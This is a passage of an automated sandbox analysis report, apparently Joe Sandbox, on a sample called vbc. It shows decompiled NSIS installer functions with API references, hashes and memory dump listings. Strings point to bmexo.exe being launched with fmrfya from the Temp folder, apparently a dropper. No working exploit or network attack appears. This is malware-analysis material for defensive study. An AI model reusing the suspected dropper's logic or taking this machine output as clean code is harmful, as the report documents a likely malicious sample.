								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}


















                                          0x0040176f
                                          0x00401776
                                          0x00401782
                                          0x00401785
                                          0x0040178a
                                          0x0040178d
                                          0x00401794
                                          0x004017b0
                                          0x00401796
                                          0x00401797
                                          0x00401797
                                          0x004017b6
                                          0x004017bb
                                          0x004017bb
                                          0x004017bf
                                          0x004017c2
                                          0x004017c7
                                          0x004017c9
                                          0x004017cb
                                          0x004017d0
                                          0x004017d0
                                          0x004017db
                                          0x004017db
                                          0x004017ec
                                          0x004017ee
                                          0x004017ee
                                          0x004017ef
                                          0x004017ef
                                          0x004017f2
                                          0x004017f5
                                          0x004017f8
                                          0x004017f8
                                          0x004017ff
                                          0x0040180e
                                          0x00401813
                                          0x00401816
                                          0x00401819
                                          0x00000000
                                          0x00000000
                                          0x0040181b
                                          0x0040181e
                                          0x00401874
                                          0x00401879
                                          0x004015b6
                                          0x0040292e
                                          0x0040292e
                                          0x00402c2a
                                          0x00402c2d
                                          0x00402c2d
                                          0x00000000
                                          0x00401820
                                          0x00401826
                                          0x0040182d
                                          0x0040183a
                                          0x00401845
                                          0x0040185b
                                          0x0040185b
                                          0x0040185e
                                          0x00000000
                                          0x00401864
                                          0x00401864
                                          0x00401865
                                          0x00401882
                                          0x00402c33
                                          0x00402c33
                                          0x00402c33
                                          0x00401867
                                          0x00401867
                                          0x00401868
                                          0x00401493
                                          0x0040239d
                                          0x0040239d
                                          0x0040239d
                                          0x00401865
                                          0x0040185e
                                          0x00402c35
                                          0x00402c39
                                          0x00402c39
                                          0x00401892
                                          0x00401897
                                          0x004018a5
                                          0x004018aa
                                          0x004018b0
                                          0x004018b4
                                          0x004018b6
                                          0x004018be
                                          0x004018ca
                                          0x004018b8
                                          0x004018b8
                                          0x004018bc
                                          0x00000000
                                          0x00000000
                                          0x004018bc
                                          0x004018d3
                                          0x004018d9
                                          0x004018db
                                          0x00000000
                                          0x004018e1
                                          0x004018e1
                                          0x004018e4
                                          0x004018fc
                                          0x004018e6
                                          0x004018e9
                                          0x004018f2
                                          0x004018f2
                                          0x00401901
                                          0x00401906
                                          0x00402398
                                          0x00000000
                                          0x00402398
                                          0x00000000

                                          APIs
                                          • lstrcatW.KERNEL32 ref: 004017B0
                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,00000000,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,007B4000,?,?,00000031), ref: 004017D5
                                            • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                          • API String ID: 1941528284-1009698528
                                          • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                          • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                                          • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                                          • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040347F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 521 40347f-4034a7 GetTickCount 522 4035d7-4035df call 40302e 521->522 523 4034ad-4034d8 call 4035fe SetFilePointer 521->523 528 4035e1-4035e5 522->528 529 4034dd-4034ef 523->529 530 4034f1 529->530 531 4034f3-403501 call 4035e8 529->531 530->531 534 403507-403513 531->534 535 4035c9-4035cc 531->535 536 403519-40351f 534->536 535->528 537 403521-403527 536->537 538 40354a-403566 call 406b96 536->538 537->538 539 403529-403549 call 40302e 537->539 544 4035d2 538->544 545 403568-403570 538->545 539->538 546 4035d4-4035d5 544->546 547 403572-40357a call 406210 545->547 548 403593-403599 545->548 546->528 552 40357f-403581 547->552 548->544 549 40359b-40359d 548->549 549->544 551 40359f-4035b2 549->551 551->529 553 4035b8-4035c7 SetFilePointer 551->553 554 403583-40358f 552->554 555 4035ce-4035d0 552->555 553->522 554->536 556 403591 554->556 555->546 556->551
                                          C-Code - Quality: 93%
                                          			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x78e743
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                          0x0040348f
                                          0x004034a2
                                          0x004034a7
                                          0x004035d7
                                          0x004035d9
                                          0x00000000
                                          0x004035df
                                          0x004034b3
                                          0x004034c6
                                          0x004034cc
                                          0x004034d2
                                          0x004034dd
                                          0x004034e2
                                          0x004034e7
                                          0x004034ef
                                          0x004034f1
                                          0x004034f1
                                          0x004034fa
                                          0x00403501
                                          0x00000000
                                          0x00000000
                                          0x00403507
                                          0x0040350d
                                          0x00403513
                                          0x00000000
                                          0x00403519
                                          0x0040351f
                                          0x0040353f
                                          0x00403544
                                          0x00403549
                                          0x0040354f
                                          0x00403555
                                          0x00403566
                                          0x00000000
                                          0x00000000
                                          0x00403568
                                          0x0040356e
                                          0x00403570
                                          0x00403593
                                          0x00403599
                                          0x00000000
                                          0x00000000
                                          0x0040359b
                                          0x0040359d
                                          0x00000000
                                          0x00000000
                                          0x0040359f
                                          0x0040359f
                                          0x004035b2
                                          0x00000000
                                          0x00000000
                                          0x004035c1
                                          0x00000000
                                          0x004035c1
                                          0x0040357a
                                          0x00403581
                                          0x004035ce
                                          0x004035d4
                                          0x004035d4
                                          0x00000000
                                          0x004035d4
                                          0x00403583
                                          0x00403589
                                          0x0040358f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004035d2
                                          0x004035d2
                                          0x00000000
                                          0x004035d2
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493
                                            • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,{ky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FilePointer$CountTick
                                          • String ID: 07y$Cx${ky
                                          • API String ID: 1092082344-2003166005
                                          • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                          • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                                          • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                                          • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 557 4069cb-4069eb GetSystemDirectoryW 558 4069ed 557->558 559 4069ef-4069f1 557->559 558->559 560 406a02-406a04 559->560 561 4069f3-4069fc 559->561 563 406a05-406a38 wsprintfW LoadLibraryExW 560->563 561->560 562 4069fe-406a00 561->562 562->563
                                          C-Code - Quality: 100%
                                          			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                          0x004069e2
                                          0x004069eb
                                          0x004069ed
                                          0x004069ed
                                          0x004069f1
                                          0x00406a04
                                          0x004069fe
                                          0x004069fe
                                          0x004069fe
                                          0x00406a1d
                                          0x00406a31
                                          0x00406a38

                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                                          • wsprintfW.USER32 ref: 00406A1D
                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                          • String ID: %s%S.dll$UXTHEME$\
                                          • API String ID: 2200240437-1946221925
                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                          • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 564 405b9f-405bea CreateDirectoryW 565 405bf0-405bfd GetLastError 564->565 566 405bec-405bee 564->566 567 405c17-405c19 565->567 568 405bff-405c13 SetFileSecurityW 565->568 566->567 568->566 569 405c15 GetLastError 568->569 569->567
                                          C-Code - Quality: 100%
                                          			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                          0x00405baa
                                          0x00405bae
                                          0x00405bb1
                                          0x00405bb7
                                          0x00405bbb
                                          0x00405bbf
                                          0x00405bc7
                                          0x00405bce
                                          0x00405bd4
                                          0x00405bdb
                                          0x00405be2
                                          0x00405bea
                                          0x00405bec
                                          0x00000000
                                          0x00405bec
                                          0x00405bf6
                                          0x00405bfd
                                          0x00405c13
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405c15
                                          0x00405c19

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                                          • GetLastError.KERNEL32 ref: 00405BF6
                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                                          • GetLastError.KERNEL32 ref: 00405C15
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 3449924974-4017390910
                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                          • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 570 40618d-406199 571 40619a-4061ce GetTickCount GetTempFileNameW 570->571 572 4061d0-4061d2 571->572 573 4061dd-4061df 571->573 572->571 574 4061d4 572->574 575 4061d7-4061da 573->575 574->575
                                          C-Code - Quality: 100%
                                          			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                          0x00406193
                                          0x00406199
                                          0x0040619a
                                          0x0040619a
                                          0x0040619f
                                          0x004061a0
                                          0x004061a3
                                          0x004061a8
                                          0x004061ab
                                          0x004061b5
                                          0x004061c2
                                          0x004061c6
                                          0x004061ce
                                          0x00000000
                                          0x00000000
                                          0x004061d2
                                          0x00000000
                                          0x004061d4
                                          0x004061d4
                                          0x004061d4
                                          0x004061d7
                                          0x004061da
                                          0x004061da
                                          0x004061dd
                                          0x00000000

                                          APIs
                                          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                          • API String ID: 1716503409-4262883142
                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                          • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 576 403377-403384 577 4033a2-4033ab call 40347f 576->577 578 403386-40339c SetFilePointer 576->578 581 4033b1-4033c4 call 4061e1 577->581 582 403479-40347c 577->582 578->577 585 403469 581->585 586 4033ca-4033dd call 40347f 581->586 588 40346b-40346c 585->588 590 4033e3-4033e6 586->590 591 403477 586->591 588->582 592 403445-40344b 590->592 593 4033e8-4033eb 590->593 591->582 594 403450-403467 ReadFile 592->594 595 40344d 592->595 593->591 596 4033f1 593->596 594->585 597 40346e-403471 594->597 595->594 598 4033f6-403400 596->598 597->591 599 403402 598->599 600 403407-403419 call 4061e1 598->600 599->600 600->585 603 40341b-403422 call 406210 600->603 605 403427-403429 603->605 606 403441-403443 605->606 607 40342b-40343d 605->607 606->588 607->598 608 40343f 607->608 608->591
                                          C-Code - Quality: 92%
                                          			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
